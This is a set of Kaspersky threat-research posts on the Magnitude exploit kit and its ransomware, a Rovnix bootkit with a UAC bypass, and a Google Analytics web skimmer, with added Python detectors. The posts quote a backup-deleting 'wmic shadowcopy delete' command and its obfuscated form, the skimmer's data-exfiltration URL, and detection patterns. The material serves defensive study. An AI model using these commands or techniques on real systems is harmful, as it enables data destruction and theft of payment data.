Kaspersky

June 24, 2020

Magnitude exploit kit – evolution

Exploit kits are not as widespread as they used to be. In the past, they relied on the use of already patched vulnerabilities. Newer and more secure web browsers with automatic updates simply do not allow known vulnerabilities to be exploited. It was very different back in the heyday of Adobe Flash, because Flash is just a plugin for a web browser: even if the user has an up-to-date browser, there is a non-zero chance that Adobe Flash is still vulnerable to 1-day exploits. Now that Adobe Flash is about to reach its end-of-life date at the end of this year, it is disabled by default in all web browsers and has largely been replaced with open standards such as HTML5, WebGL and WebAssembly. The decline of exploit kits can be linked to the decline of Adobe Flash, but exploit kits have not disappeared completely. They have adapted and switched to targeting users of Internet Explorer without the latest security updates installed.

Microsoft Edge replaced Internet Explorer as the default web browser with the release of Windows 10 in 2015, but Internet Explorer is still installed for backward compatibility on machines running Windows 10 and remains the default web browser on Windows 7/8/8.1. The switch to Microsoft Edge development also meant that Internet Explorer would no longer be actively developed and would only receive vulnerability patches without general security improvements. Still, somehow, Internet Explorer remains a relatively popular web browser. According to NetMarketShare, as of April 2020 Internet Explorer is used on 5.45% of desktop computers (for comparison, Firefox accounts for 7.25%, Safari 3.94%, Edge 7.76%). Not only is the security of Internet Explorer five years behind that of its modern counterparts, it also still supports a number of legacy script engines. CVE-2018-8174 is a vulnerability in the legacy VBScript engine that was originally discovered in the wild as an exploited zero-day. The majority of exploit kits quickly adopted it as their primary exploit.

Since the discovery of CVE-2018-8174 a few more vulnerabilities for Internet Explorer have been discovered as in-the-wild zero-days: CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674. All of them exploited another legacy component of Internet Explorer – a JScript engine. It felt like it was just a matter of time until exploit kits adopted these new exploits.

Exploit kits still play a role in today’s threat landscape and continue to evolve. For this blogpost I studied and analyzed the evolution of one of the most sophisticated exploit kits out there – Magnitude EK – for a whole year.

This blogpost in a nutshell:

  • Magnitude EK continues to deliver ransomware to Asia Pacific (APAC) countries via malvertising
  • Study of the exploit kit’s activity over a period of 12 months shows that Magnitude EK is actively maintained and undergoes continuous development
  • In February this year Magnitude EK switched to an exploit for the more recent vulnerability CVE-2019-1367 in Internet Explorer (originally discovered as an exploited zero-day in the wild)
  • Magnitude EK uses a previously unknown elevation of privilege exploit for CVE-2018-8641 developed by a prolific exploit writer
Introduction

Magnitude EK is one of the longest-standing exploit kits. It was on offer in underground forums from 2013 and later became a private exploit kit. As well as a change of actors, the exploit kit has switched its focus to deliver ransomware to users from specific Asia Pacific (APAC) countries via malvertising.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Active attacks by Magnitude EK in 2019 according to Kaspersky Security Network (KSN) (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Active attacks by Magnitude EK in 2020 according to Kaspersky Security Network (KSN) (download)

Our statistics show that this campaign continues to target APAC countries to this day, and during the year in question Magnitude EK always used its own ransomware as the final payload.

Infection vector

Like the majority of exploit kits out there, in 2019 Magnitude EK used CVE-2018-8174. However, the attackers behind Magnitude EK were one of the first to adopt the much newer vulnerability CVE-2019-1367 and they have been using it as their primary exploit since February 11, 2020. As was the case with CVE-2018-8174, they didn’t develop their own exploit for CVE-2019-1367, instead reusing the original zero-day and modifying it with their own shellcode and obfuscation.

CVE-2019-1367 is a use-after-free vulnerability caused by the garbage collector not tracking a value that was not rooted in the legacy JavaScript engine jscript.dll. By default, Internet Explorer 11 uses Jscript9.dll, but a script can still be executed by the legacy engine by enabling compatibility mode with Internet Explorer 7/8 and selecting a legacy script language. This can be done with the following markup:

    <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
    <script language="JScript.Compact">…</script>

    <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
    <script language="JScript.Encode">…</script>

The original exploit uses JScript.Compact, a special profile defined for embedded devices. But JScript.Encode is much more interesting, because it was developed by Microsoft to protect scripts and prevent source code from being copied. This language value executes scripts encoded with Microsoft Script Encoder (screnc.exe) and also disables script debugging. Basically, it is DRM for JavaScript. Magnitude EK modified the original exploit to take advantage of this feature.

Exploit packed with JScript.Encode technique

Unpacked exploit. Shellcode, names and some strings are obfuscated

Shellcode

Their shellcodes piqued my interest. They use a huge number of different shellcode encoders, from the classic Metasploit shikata_ga_nai encoder and the DotNetToJScript technique to a variety of custom encoders and stagers.

It was also impossible not to notice the changes happening to their main shellcode responsible for launching the ransomware payload. The attackers are fine-tuning their arsenal on a regular basis.

Magnitude EK has existed since at least 2013, but below you can see just the changes to payload/shellcode that occurred over the period of one year (June 2019 to June 2020). During this period we observed attacks happening almost every day.

Timeline of shellcode/payload changes

  • June 2019: The shellcode downloads a payload that is decrypted with a custom XOR-based algorithm. All strings are assembled on the stack, so changing the payload URL requires recompiling the shellcode. The payload is a PE module whose export function name is hardcoded to “GrfeFVGRe”. The payload is executed in an Internet Explorer process. It contains an elevation of privilege exploit with support for x86 and x64 versions of Windows and an encrypted ransomware payload. After elevation of privilege it injects the ransomware payload into other processes, spawns a wuapp.exe process and injects there as well. If process creation fails, it also runs the ransomware from the current process.
  • July 20, 2019: The payload module export function name is auto-generated.
  • November 11, 2019: The shellcode tries to inject the payload into other processes. If the API function Process32First fails, it spawns wuapp.exe from the Windows directory and injects the payload there. The injection method is WriteProcessMemory + CreateRemoteThread. The payload is ransomware without elevation of privilege. The payload module export function name is hardcoded again, this time to “lssrcdxhg”.
  • November 20, 2019: The attackers appear to have mixed up their shellcode folder: in some attacks they use the shellcode from June, and later the same day they start using the November shellcode with a new hardcoded export name, “by5eftgdbfgsq323”.
  • November 23, 2019: The elevation of privilege exploit is back in use, but now the integrity level of the process is checked first. If it is a low integrity process, the payload with the exploit is executed in the current process; otherwise it is injected into other processes. The process is no longer created from the shellcode, but it is still created from the payload. The payload module export name is hardcoded to “gv65eytervsawer2”.
  • January 17, 2020: It looks like the attackers took a short holiday at the beginning of the year. The shellcode remains the same, but the payload module export function name is hardcoded to “i4eg65tgq3f4”. The payload changed slightly: the name of the created process is now assembled on the stack, and the process itself changed. It no longer spawns wuapp.exe but launches the calculator, calc.exe, and injects the ransomware payload there.
  • January 27, 2020: The payload is no longer a PE module but plain shellcode. It consists of ransomware without elevation of privilege.
  • February 4, 2020: The payload is a PE module again, and once again the export name is auto-generated.
  • February 10, 2020: The shellcode comes with two URLs for different payloads. It checks the process integrity level and, depending on the result, either executes the elevation of privilege payload or uses the ransomware payload straight away. All strings and function imports in the exploit are now obfuscated. The payload does not spawn a new process and only injects into others.
  • February 11, 2020: Magnitude EK starts using CVE-2019-1367 as its primary exploit. The attackers use the shellcode from January 27, 2020, modified to check for the name of a particular process. If the process exists, they do not execute the payload from Internet Explorer. The process name is “ASDSvc” (AhnLab, Inc.).
  • February 17, 2020: The attackers switch to the shellcode from February 10, 2020, but the payload module export function name is hardcoded to “xs324qsawezzse”.
  • February 28, 2020: Shellcode encryption is removed. The payload module export function name is hardcoded to “sawd6vf3y5”.
  • March 1, 2020: Strings are no longer stored on the stack.
  • March 6, 2020: Back to the shellcode from February 17, 2020.
  • March 10, 2020: The attackers add some of the functionality implemented after February 17, 2020: payload encryption is removed and strings are no longer stored on the stack. The payload module export function name is still hardcoded to “xs324qsawezzse”.
  • March 16, 2020: Functionality is added to avoid injecting into a particular process (explorer.exe). The injection method is changed to NtCreateSection + NtMapViewOfSection + RtlCreateUserThread.
  • April 2, 2020: The attackers add functionality similar to that used in November 2019. They check the integrity level of the process; if it is a low integrity process, they execute the payload from the current process. Otherwise they inject it into other processes (except explorer.exe) and at the end create a new process and inject there as well. The created process is C:\Program Files\Windows Media Player\wmlaunch.exe or C:\Program Files (x86)\Windows Media Player\wmlaunch.exe, depending on whether the current process is WOW64 or not.
  • April 4, 2020: The shellcode is updated to use a new injection technique: NtQueueApcThread. It also comes with a URL for a ransomware payload without elevation of privilege. The shellcode checks the integrity level and, if it is a low integrity process, calls ExitProcess(). Use of the hardcoded export name “xs324qsawezzse” is also stopped.
  • April 7, 2020: Back to the shellcode from April 2, 2020.
  • May 5, 2020: Having previously adjusted their injection method, the attackers revert to injection via WriteProcessMemory + CreateRemoteThread.
  • May 6, 2020: They continue to change the code injection method; from now on they use NtCreateThreadEx.


Elevation of privilege exploit

The elevation of privilege exploit used by Magnitude EK is quite interesting. When I saw it for the first time, I wasn’t able to recognize this particular exploit. It exploited a vulnerability in the win32k kernel driver, and closer analysis revealed that this particular vulnerability was fixed in December 2018. According to Microsoft, only two win32k-related elevation of privilege vulnerabilities were fixed that month: CVE-2018-8639 and CVE-2018-8641. Microsoft previously shared more information with us about CVE-2018-8639, so we can say with some certainty that the encountered exploit targets CVE-2018-8641. The exploit has strong code similarities with another zero-day that we had found previously, CVE-2019-0859. Based on these similarities, we attribute this exploit to the prolific exploit writer known as “Volodya”, “Volodimir” or “BuggiCorp”. Volodya is famous for selling zero-day exploits to both APT groups and criminals. In the past, Volodya advertised his services at exploit(dot)in, the same underground forum where Magnitude EK was once advertised. We don’t currently know whether the exploit for CVE-2018-8641 was initially used as a zero-day or was developed as a 1-day exploit through patch diffing. It is also important to note that a public exploit for CVE-2018-8641 exists, but it is incorrectly attributed to CVE-2018-8639 and exploits the vulnerability in a different way, meaning there are two completely different exploits for the same vulnerability.

Ransomware

Magnitude EK uses its own ransomware as its final payload. The ransomware comes with a temporary encryption key and a list of domain names, both of which the attackers change frequently. Files are encrypted with Microsoft CryptoAPI using the Microsoft Enhanced RSA and AES Cryptographic Provider (PROV_RSA_AES). The initialization vector (IV) is generated pseudo-randomly for each file, and a 0x100-byte blob containing the encrypted IV is appended to the end of the file. The ransomware does not encrypt files located in common folders such as documents and settings, appdata, local settings, sample music, tor browser, etc. Before encryption, each file’s extension is checked against a hash table of extensions eligible for encryption that contains 715 entries. A ransom note is left in each folder with encrypted files, and at the end a notepad.exe process is created to display it. To hide the origin of the executed process, the ransomware uses one of two techniques: “wmic process call create” or “pcalua.exe -a … -c …”. After encryption the ransomware also attempts to delete backups of the files with the “wmic shadowcopy delete” command, executed via a UAC bypass.

Example of Magnitude EK ransom note

The core of the ransomware did not undergo many changes throughout the year. If we compare old samples with more recent versions, there are only a few notable changes:

  • In older versions, immediately at launch the payload gets the default UI language of the operating system using the GetSystemDefaultUILanguage API function and compares the returned value against a couple of hardcoded language IDs (e.g. zh-HK – Hong Kong S.A.R., zh-MO – Macao S.A.R., zh-CN – People’s Republic of China, zh-SG – Singapore, zh-TW – Taiwan, ko-KR – Korea, ms-BN – Brunei Darussalam, ms-MY – Malaysia). If the language ID doesn’t match, then ExitProcess() will be executed. In newer versions, the check for the language ID was removed.
  • In older versions, the ransomware deletes file backups with the command “cmd.exe /c “%SystemRoot%\system32\wbem\wmic shadowcopy delete” via UAC-bypass in eventvwr.exe. In the newer version, the command is obfuscated with caret character insertion “cmd.exe /c “%SystemRoot%\system32\wbem\wmic ^s^h^a^d^o^w^c^o^p^y^ ^d^e^l^e^t^e” and executed via UAC-bypass in CompMgmtLauncher.exe.
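The caret trick above works because cmd.exe removes the outer quotes of a /C argument that contains special characters and then treats every unquoted ^ as an escape, so the string that finally runs is plain “wmic shadowcopy delete”. The following is an added detection example, not code from the Magnitude EK payload: it reproduces that normalization so that process-creation logs can be matched against the de-obfuscated command rather than the raw one. The sample command lines are constructed from the two variants quoted above plus one benign line, and the cmd.exe parsing rules are simplified to the cases that matter for this obfuscation.

```python
"""Normalise cmd.exe caret obfuscation and flag shadow-copy deletion.

Added example, not code from the Magnitude EK payload. The two sample command
lines reproduce the variants quoted in the text; the third is a constructed
benign line. The cmd.exe quote/caret rules implemented here are simplified to
the cases that matter for this obfuscation."""
import re
from typing import Optional

# Characters cmd.exe treats as special when deciding whether to keep the
# quotes around a /C argument (from the rules listed by `cmd /?`).
CMD_SPECIAL = set('&<>()@^|')


def cmd_c_payload(cmdline: str) -> Optional[str]:
    """Return the string cmd.exe /C (or /K) would execute, or None if the
    line is not a cmd.exe invocation.

    If the argument is wrapped in quotes and contains a special character
    (which a caret-obfuscated command always does), cmd.exe removes the first
    and the last quote and executes what is left, so the carets that looked
    'protected' by the quotes are processed as escape characters after all."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s*(.*)$',
                 cmdline, re.S)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"') and rest.count('"') >= 2 and bool(CMD_SPECIAL & set(rest)):
        last = rest.rfind('"')
        rest = rest[1:last] + rest[last + 1:]
    return rest


def decaret(s: str) -> str:
    """Apply the cmd.exe escape rule: outside double quotes a ^ is dropped and
    the following character is taken literally; inside quotes ^ is ordinary."""
    out, in_quote, i = [], False, 0
    while i < len(s):
        c = s[i]
        if c == '"':
            in_quote = not in_quote
            out.append(c)
        elif c == '^' and not in_quote:
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 1
        else:
            out.append(c)
        i += 1
    return ''.join(out)


def normalize(cmdline: str) -> str:
    """Lower-cased, whitespace-collapsed form of what would actually run."""
    payload = cmd_c_payload(cmdline)
    text = decaret(payload if payload is not None else cmdline)
    return re.sub(r'\s+', ' ', text).strip().lower()


SHADOW_COPY_DELETION = (
    r'\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b',   # variant used by the ransomware
    r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b',   # common alternative, added for coverage
)


def deletes_shadow_copies(cmdline: str) -> bool:
    """True if the de-obfuscated command line deletes volume shadow copies."""
    n = normalize(cmdline)
    return any(re.search(p, n) for p in SHADOW_COPY_DELETION)


# Constructed samples: the two variants from the text plus a benign line.
SAMPLES = [
    r'cmd.exe /c "%SystemRoot%\system32\wbem\wmic shadowcopy delete"',
    r'cmd.exe /c "%SystemRoot%\system32\wbem\wmic ^s^h^a^d^o^w^c^o^p^y^ ^d^e^l^e^t^e"',
    r'cmd.exe /c "echo ^done"',
]

if __name__ == '__main__':
    for line in SAMPLES:
        print(deletes_shadow_copies(line), '<-', normalize(line))
```

Matching on the normalized form rather than the raw command line is what keeps the second sample from slipping past a pattern written for the first; a rule that only looks for the literal string “shadowcopy delete” misses the caret variant entirely.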
Conclusions

The total volume of attacks performed by exploit kits has decreased, but they still exist, are still active, and still pose a threat, and therefore need to be treated seriously. Magnitude is not the only active exploit kit and we see other exploit kits that are also switching to newer exploits for Internet Explorer. We recommend installing security updates, migrating to a newer operating system (make sure you stay up to date with Windows 10 builds) and also not using Internet Explorer as your web browser. Throughout the entire Magnitude EK campaign we have detected the use of Internet Explorer exploits with the verdict PDM:Exploit.Win32.Generic.


June 23, 2020

Oh, what a boot-iful mornin’

In mid-April, our threat monitoring systems detected malicious files being distributed under the name “on the new initiative of the World Bank in connection with the coronavirus pandemic” (in Russian) with the extension EXE or RAR. Inside the files was the well-known Rovnix bootkit. There is nothing new about cybercriminals exploiting the coronavirus topic; the novelty is that Rovnix has been updated with a UAC bypass tool and is being used to deliver a loader that is unusual for it. Without further ado, let’s proceed to an analysis of the malware according to the rules of dramatic structure.

Exposition: enter SFX archive

The file “on the new initiative of the World Bank in connection with the coronavirus pandemic.exe” is a self-extracting archive that dishes up easymule.exe and 1211.doc.

SFX script

The document does indeed contain information about a new initiative of the World Bank, and real individuals related to the organization are cited as the authors in the metadata.

Contents of 1211.doc

As for easymule.exe, its resources contain a bitmap image that is actually an executable file, which it unpacks and loads into memory.

Loading the “image”

Hook: enter UAC bypass

The code of the PE loaded into memory contains many sections remarkably similar to the known Rovnix bootkit and its modules, the source code of which leaked back in 2013.

Left: source of the malware; right: leaked Rovnix source code (bksetup.c)

However, the file under analysis reveals innovations clearly added by authors, based on the original Rovnix source code. One of them is a UAC bypass mechanism that uses the “mocking trusted directory” technique.

With the aid of the Windows API, the malware creates the directory C:\Windows \System32 (with a space after Windows). It then copies there a legitimate signed executable from C:\Windows\System32 that is allowed to auto-elevate without displaying a UAC prompt (in this case, wusa.exe).

DLL hijacking is additionally used: a malicious library is placed in the fake directory under the name of one of the libraries imported by the legitimate file (in this case, wtsapi32.dll). As a result, when wusa.exe is run from the fake directory, its path passes the trusted-directory check because the GetLongPathNameW API removes the trailing space from the path component. The legitimate file is therefore launched from the fake directory without a UAC prompt and loads the malicious wtsapi32.dll placed next to it.

Besides copying the legitimate system file to the fake directory and creating a malicious library there, the dropper creates another file named uninstall.pdg. After that, the malware creates and runs a series of BAT files that start wusa.exe from the fake directory and then clean up the traces by deleting the created directory and the easymule.exe dropper itself.
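The weakness exploited above is that Win32 path normalization silently drops trailing spaces (and dots) from path components, so “C:\Windows \System32” compares equal to the real trusted directory while being a different folder on disk. The following is an added hunting example, not part of the original analysis or of the Rovnix code: it flags paths that impersonate a trusted directory in exactly this way, both over a constructed inventory of paths and, on a Windows host, over a live volume. The trusted-directory list and the sample paths are assumptions made for the example.

```python
"""Detect 'mock trusted directory' paths such as 'C:\\Windows \\System32'.

Added example, not part of the original analysis or of the Rovnix code. Win32
path normalisation (GetLongPathNameW and friends) removes trailing spaces and
dots from each path component, so a directory whose name differs from a
trusted one only by such characters compares equal to it during the
auto-elevation check while still being a different directory on disk. The
sample paths below are constructed."""
import os
from typing import Iterable, List, Optional, Tuple

# Directories whose contents Windows trusts for auto-elevation (assumption:
# the list is illustrative; extend it for your environment).
TRUSTED_DIRS = (
    r'C:\Windows\System32',
    r'C:\Windows\SysWOW64',
    r'C:\Program Files',
    r'C:\Program Files (x86)',
)


def mock_trusted_dir(path: str) -> Optional[str]:
    """Return the trusted directory `path` impersonates, or None.

    A path impersonates a trusted directory when, after stripping the trailing
    spaces/dots that normalisation would drop, it equals that directory or lies
    beneath it, while the raw string did contain such characters."""
    parts = path.rstrip('\\').split('\\')
    cleaned = [p.rstrip(' .') for p in parts]
    if cleaned == parts:
        return None                       # nothing for normalisation to remove
    canon = '\\'.join(cleaned).lower()
    for trusted in TRUSTED_DIRS:
        t = trusted.lower()
        if canon == t or canon.startswith(t + '\\'):
            return trusted
    return None


def scan_entries(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Filter a list of paths (e.g. from a file-system inventory) down to the
    ones that impersonate a trusted directory."""
    hits = []
    for p in paths:
        target = mock_trusted_dir(p)
        if target:
            hits.append((p, target))
    return hits


def find_on_disk(root: str = 'C:\\', max_depth: int = 2):
    """Walk a live volume a few levels deep and yield impersonating paths.
    Only meaningful on Windows; on other platforms it simply yields nothing."""
    base_depth = root.rstrip('\\').count('\\')
    for dirpath, dirnames, _ in os.walk(root):
        hit = mock_trusted_dir(dirpath)
        if hit:
            yield dirpath, hit
        if dirpath.rstrip('\\').count('\\') - base_depth >= max_depth:
            dirnames[:] = []              # do not descend further


# Constructed sample inventory.
SAMPLE_DIRS = [
    r'C:\Windows\System32',               # genuine
    r'C:\Windows \System32',              # trailing space after 'Windows' (the case in the text)
    r'C:\Windows \System32\wusa.exe',     # auto-elevating binary copied into the fake tree
    r'C:\Program Files \Common Files',    # same trick against another trusted root
    r'C:\Users\alice\Windows \System32',  # trailing space, but not under a trusted root
]

if __name__ == '__main__':
    for path, target in scan_entries(SAMPLE_DIRS):
        print(f'{path!r} impersonates {target}')
```

Such directories cannot be created through Explorer or a normal cmd.exe session, which is why their mere existence is a strong signal; the same check can be pointed at file-creation telemetry from an EDR instead of a disk walk.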

Development: enter Rovnix

The file uninstall.pdg clearly contains a packed executable. It is designed to be unpacked by the same malicious library that was previously loaded via wusa.exe and DLL hijacking.

Uninstall.pdg

The code of the malicious library is kept minimal: the exported function WTSQueryUserToken clearly implements none of the functionality that the original wusa.exe, which imports it, expects. Instead, the function reads uninstall.pdg, unpacks the executable inside it and runs it.

Code of exported malicious library function

The unpacked uninstall.pdg turns out to be a DLL with the exported function BkInstall — another indicator that the malware is based on the leaked Rovnix code. Further analysis of the file confirms this.

Glued inside uninstall.pdg are executable files packed with aPLib. The gluing was done using the FJ utility (also from the Rovnix bootkit), as evidenced by the file-unpacking algorithm and the FJ signatures indicating the location of the joint in the file.

FJ utility signature

The glued files are the KLoader driver from the leaked Rovnix bootkit and a bootloader. Uninstall.pdg unpacks them, overwrites the VBR with the bootloader, and places the packed original VBR next to it. In addition, KLoader is written to the disk; its purpose is to inject the payload into running processes.

Left: source code of the malware; right: leaked Rovnix source code (kloader.c)

As seen in the screenshot, the source code of the malware is not much different from the original. The original code was seemingly compiled for use without a VFS and a protocol stack for the driver to operate with the network.

In this instance, the driver injects a DLL into the processes, which is that same un-Rovnix-like loader that we spoke about at the very beginning.

Thus, the general execution scheme looks as follows.

Execution scheme

Climax: enter loader

Let’s consider the new loader in more detail. The first thing to catch the eye is the PDB path in the file.

PDB path

When run, the malware first fills a structure in allocated memory with pointers to functions, which are subsequently called by their offset in that memory area.

Structure with functions

Next, the process obtains access to the Winsta0 and Default desktop objects for itself and all processes created by this process, and creates a thread with the C&C communication cycle.

Creating a C&C communication thread

Communication with C&C

Having created the thread, the malware checks whether another instance is already running using OpenMutexA. It then starts the C&C communication cycle, in which a data packet about the infected device is generated, XOR-encrypted with the single-byte key 0xF7 and sent to the C&C.

Structure of sent data

In response, the malware receives an executable file that is loaded into memory. Control is transferred to the entry point of this PE file.

Displaying the PE file loaded into memory

Denouement: enter testing

The loader turns out not to be unique: several more instances were discovered during the analysis. They all have similar features, but with slight differences. For example, one of them checks that it is running properly by trying to register a NetService handler. If it fails (that is, the service is not running in the system), the malware stops working.

Example of a different version of the loader

Other instances of the loader do not use the bootkit, but do apply the same UAC bypass method. All indications are that the loader is currently being actively tested and equipped with various tools to bypass protection.

We also discovered instances that could serve as a payload for the loader. They contain similar PDB paths and the same C&Cs as the loaders. Interestingly, the addresses of the required APIs are resolved by function name, with the name obtained by index from a configuration string.

Getting the API addresses

At the command of C&C, this malware can run an EXE file with the specified parameters, record sound from the microphone and send the audio file to the cybercriminals, turn off or restart the computer, and so on.

Processing a received command

The module name (E:\LtdProducts\Project\newproject\64bits\64AllSolutions\Release\PcConnect.pdb) suggests that the developers are positioning it as a backdoor, which could additionally have Trojan-Spy elements, judging by some configuration lines.

Configuration snippet; the lines in Chinese mean “Current user:”, “user password:”, “***Below are the system account and password [%04d-%02d-%02d %02d:%02d:%02d]***”

Epilogue

Our analysis of malware masquerading as a “new initiative of the World Bank” shows that even well-known threats like Rovnix can throw up a couple of surprises when their source code goes public. Freed from the need to develop their own protection-bypassing tools from scratch, cybercriminals can pay more attention to the capabilities of their own malware and add extra “goodies” to the source code, such as UAC bypass. Kaspersky products detect this threat and its related modules as Trojan.Win32.Cidox, Trojan.Win32.Generic, Trojan.Win32.Hesv, and Trojan.Win32.Inject.

IOC

7CFC801458D64EF92E210A41B97993B0
E2A88836459088A1D5293EF9CB4B31B7
bamo.ocry[.]com:8433
45.77.244[.]191:8090
45.77.244[.]191:9090
45.77.244[.]191:5050
45.76.145[.]22:8080
149.28.30[.]158:443

June 22, 2020

Web skimming with Google Analytics

Web skimming is a common class of attacks generally aimed at online shoppers. The principle is quite simple: malicious code is injected into the compromised site, which collects and sends user-entered data to a cybercriminal resource. If the attack is successful, the cybercriminals gain access to shoppers’ payment information.

To make the data flow to a third-party resource less visible, fraudsters often register domains resembling the names of popular web services, and in particular Google Analytics (google-anatytics[.]com, google-analytcsapi[.]com, google-analytc[.]com, google-anaiytlcs[.]com, google-analytics[.]top, google-analytics[.]cm, google-analytics[.]to, google-analytics-js[.]com, googlc-analytics[.]com, etc.). But attacks of this kind have also been found to use the authentic service.

To harvest data about visitors using Google Analytics, the site owner must configure the tracking parameters in their account on analytics.google.com, get the tracking ID (trackingId, a string like this: UA-XXXX-Y), and insert it into the web pages together with the tracking code (a special snippet of code). Several tracking codes can rub shoulders on one site, sending data about visitors to different Analytics accounts.

Recently, we identified several cases where this service was misused: attackers injected malicious code into sites, which collected all the data entered by users, and then sent it via Analytics. As a result, the attackers could access the stolen data in their Google Analytics account. We found about two dozen infected sites worldwide. The victims included stores in Europe and North and South America selling digital equipment, cosmetics, food products, spare parts etc.

The screenshot below shows how the infection looks — malicious code with the attacker’s tracking code and tracking ID:

Screenshot 1

The attacker tries to hide their malicious activity using a classic anti-debugging technique. Screenshot 2 shows code for checking whether Developer mode is enabled in the visitor’s browser. The code in the screenshot above is executed only if the result is negative.

Screenshot 2

Curiously, the attackers left themselves a loophole — the option to monitor the script in Debug mode. If the browser’s local storage (localStorage) contains the value ‘debug_mode’==’11’, the malicious code will spring into life even with the developer tools open, and will go as far as to write comments to the console in clumsy English with errors. In screenshot 3, the line with the ‘debug_mode’ check follows the implementation of the RC4 encryption algorithm (used to encrypt the harvested data before sending it).

Screenshot 3

If the anti-debugging is passed, the script collects everything anyone inputs on the site (as well as information about the user who entered the data: IP address, UserAgent, time zone). The collected data is encrypted and sent using the Google Analytics Measurement Protocol. The collection and sending process is shown in screenshot 4.

Screenshot 4

The stolen data is sent as an event hit via the send method, packed into the ‘eventAction’ field.

The function signature in this case is:

    ga('send', 'event', {
      'eventCategory': 'Category', // Protocol Parameter: ec; Value type: text; Max Length: 150 Bytes
      'eventAction': 'Action',     // Protocol Parameter: ea; Value type: text; Max Length: 500 Bytes
      'eventLabel': 'Label'        // Protocol Parameter: el; Value type: text; Max Length: 500 Bytes
    });

This leads to an HTTP request being sent to the URL
https[:]//www.google-analytics.com/collect?<parameters>&ea=packed_stolen_data&<parameters>
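Because the exfiltration rides on legitimate Measurement Protocol hits to the real google-analytics.com host, blocking by domain is not an option; what remains distinguishable is the content of the hit. The following is an added detection example, not the skimmer's code: it parses collect requests as they appear in a proxy log and flags hits whose event parameters carry long, high-entropy, base64-like values instead of readable labels, or whose tracking ID is not one the site itself deploys. The allow-listed tracking ID, the sample hits and the stand-in for the RC4-then-base64 payload are all constructed for the example.

```python
"""Flag Google Analytics 'collect' hits whose event fields carry packed data.

Added example, not the skimmer's code. It inspects Measurement Protocol
requests as they appear in a proxy log and flags hits where an event parameter
(ec/ea/el) looks like encoded ciphertext rather than a readable label, or where
the tracking ID is not one the site legitimately deploys. KNOWN_TIDS, the
sample hits and the packed payload are all constructed."""
import math
import re
from urllib.parse import parse_qs, urlencode, urlsplit

KNOWN_TIDS = {'UA-1234567-1'}          # the site's own tracking IDs (constructed)
EVENT_FIELDS = ('ec', 'ea', 'el')      # eventCategory / eventAction / eventLabel
MIN_PACKED_LEN = 64                    # shorter values are plausible labels
ENTROPY_THRESHOLD = 4.5                # bits/char; English labels sit around 4
PACKED_ALPHABET = re.compile(r'[A-Za-z0-9+/=_-]+')   # base64 / url-safe base64


def shannon_entropy(s: str) -> float:
    """Bits per character of the value's empirical character distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze_hit(url: str) -> dict:
    """Classify one request URL as 'ok', 'unknown-tid' or 'exfiltration'."""
    u = urlsplit(url)
    if not u.netloc.endswith('google-analytics.com') or not u.path.endswith('/collect'):
        return {'relevant': False}
    q = {k: v[0] for k, v in parse_qs(u.query).items()}
    tid = q.get('tid', '')
    reasons = []
    for field in EVENT_FIELDS:
        val = q.get(field, '')
        if (len(val) >= MIN_PACKED_LEN and PACKED_ALPHABET.fullmatch(val)
                and shannon_entropy(val) > ENTROPY_THRESHOLD):
            reasons.append(f'{field} carries {len(val)} chars of high-entropy packed data')
    if reasons:
        verdict = 'exfiltration'
    elif tid not in KNOWN_TIDS:
        verdict = 'unknown-tid'
        reasons.append(f'tracking id {tid or "<none>"} is not deployed on this site')
    else:
        verdict = 'ok'
    return {'relevant': True, 'tid': tid, 'verdict': verdict, 'reasons': reasons}


def collect_url(**params) -> str:
    """Build a Measurement Protocol hit the way analytics.js would encode it."""
    return 'https://www.google-analytics.com/collect?' + urlencode(params)


# Constructed stand-in for RC4 ciphertext that has been base64-encoded: 128
# characters in which every base64 symbol appears exactly twice.
_B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
PACKED = ''.join(_B64[(i * 37) % 64] for i in range(128))

LEGIT_HIT = collect_url(v='1', tid='UA-1234567-1', cid='555', t='event',
                        ec='Checkout', ea='AddToCart', el='SKU-42')
SKIMMER_HIT = collect_url(v='1', tid='UA-7654321-2', cid='555', t='event',
                          ec='Category', ea=PACKED, el='Label')

if __name__ == '__main__':
    for hit in (LEGIT_HIT, SKIMMER_HIT):
        result = analyze_hit(hit)
        print(result['verdict'], result['reasons'])
```

An unknown tracking ID on its own is only a lead (marketing teams add accounts without telling security), which is why it is reported separately from the packed-data verdict; the entropy check is what actually separates a 500-byte ciphertext blob from a long but readable product name.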

In the above-described case, malicious code is inserted into a script on the infected site in “readable” form. In other cases, however, the injection can be obfuscated. Malicious code also can be downloaded from a third-party resource. Screenshot 5 shows an example obfuscation option. In this variant, a call to a malicious script from firebasestorage.googleapis[.]com is inserted into the infected site.

Screenshot 5

After deobfuscation, we obtain a similar script with the same distinctive comments. Part of its code is presented in screenshot 6 (a different tracking ID is used).

Screenshot 6

What’s the danger

Google Analytics is an extremely popular service (used on more than 29 million sites, according to BuiltWith) and is blindly trusted by users: administrators write *.google-analytics.com into the Content-Security-Policy header (used for listing resources from which third-party code can be downloaded), allowing the service to collect data. What’s more, the attack can be implemented without downloading code from external sources.

How to avoid the issues

Users:

